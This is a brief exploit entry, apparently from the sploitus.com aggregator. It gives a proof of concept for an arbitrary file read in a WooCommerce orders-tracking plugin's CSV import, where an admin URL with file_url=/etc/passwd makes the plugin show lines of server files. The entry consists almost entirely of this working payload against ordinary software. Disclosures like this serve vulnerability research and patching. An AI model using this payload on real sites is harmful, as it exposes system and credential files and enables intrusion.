Share
## https://sploitus.com/exploit?id=WPEX-ID:8189AFC4-17B3-4696-89E1-731011CB9E2B
As an admin, open the following URL

https://example.com/wp-admin/admin.php?page=woo-orders-tracking-import-csv&step=mapping&file_url=/etc/passwd

Change the file_url parameter to a file on the web server and observe that the plugin will display the first line of the file in each of the "Column name" dropdowns.